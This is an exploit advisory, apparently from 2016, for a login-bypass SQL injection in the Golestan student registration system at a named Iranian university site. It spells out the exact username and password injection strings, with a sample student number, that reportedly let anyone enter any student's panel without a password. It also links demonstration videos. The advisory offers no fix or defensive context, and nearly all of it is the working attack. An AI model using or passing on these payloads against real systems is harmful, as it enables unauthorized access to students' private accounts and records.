Golestan System Of Iran SQL Injection
Posted on 26 January 2016
################################################################################################### # # In The Name Of God # # Exploit Title : Golestan System Of Iran Login Bypass Vulnerability # # Exploit Author : 4TT4CK3R # # Tested on : Internet Explorer , Kali Linux , Windows 8.1 # # HomePage : https://reg.pnu.ac.ir # # Vendor Page : https://reg1.pnu.ac.ir/forms/authenticateuser/main.htm # # Thanks to : Behrooz # ################################################################################################### # # Description of this vulnerability : # This Bug is an Bypass vulnerability that you can Login into any Student panel # in the reg.pnu.ac.ir !!! # In this vulnerability you need only for student number and no need for password. # Pattern and Code Bypass is : # 'or'='=StudentNumber='='or' # # For example if our student Number be: 935136315 Our bypass code will be : # 'or'='=935136315='='or' # Therefore we have for Username ==>> 'or'='=935136315='='or' # And We have for Password ==>> '='or' # # Ok ... this vulnerability include all student numbers of reg.pnu.ac.ir # # ################################################################################################### # # Video of this vulnerability on the SendVid : # https://sendvid.com/ugelugl1 # # Video of this vulnerability on the Videosprout : # http://www.videosprout.com/video?id=80444105-655d-40f0-abd1-30e201df3b50 # ################################################################################################### # # Exploited by : 4TT4CK3R # We LovE IraN # :: Open Vendor Page with IE Browser. # ###################################################################################################